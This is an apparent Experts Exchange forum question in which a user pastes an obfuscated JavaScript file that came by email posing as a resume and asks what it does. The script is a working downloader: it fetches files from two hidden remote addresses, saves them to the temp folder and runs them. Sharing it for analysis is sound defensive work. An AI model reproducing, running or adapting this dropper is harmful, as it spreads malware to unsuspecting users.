We help IT Professionals succeed at work.
Get Started

Malicious javascript pretending to be a resume: What does this script do?

252 Views
Last Modified: 2015-03-25
Hi guys,

I am not sure what the policy is about posting this sort of thing here is so I give fair warning that this code is suspected to be malicious in nature as it came via email in a zip file, pretending to be a resume

I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with javascript but and scripting in general but most of this code is unrecognisable to me.
(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn

Open in new window

My enquiring mind wants to know what this script was trying to do and how. :)

Thanks in advance.
Andrew
Comment
Watch Question
Fixer of Problems
CERTIFIED EXPERT
Most Valuable Expert 2014
Commented:
This problem has been solved!
Unlock 1 Answer and 6 Comments.
See Answer
Why Experts Exchange?

Experts Exchange always has the answer, or at the least points me in the correct direction! It is like having another employee that is extremely experienced.

Jim Murphy
Programmer at Smart IT Solutions

When asked, what has been your best career decision?

Deciding to stick with EE.

Mohamed Asif
Technical Department Head

Being involved with EE helped me to grow personally and professionally.

Carl Webster
CTP, Sr Infrastructure Consultant
Ask ANY Question

Connect with Certified Experts to gain insight and support on specific technology challenges including:

  • Troubleshooting
  • Research
  • Professional Opinions
Did You Know?

We've partnered with two important charities to provide clean water and computer science education to those who need it most. READ MORE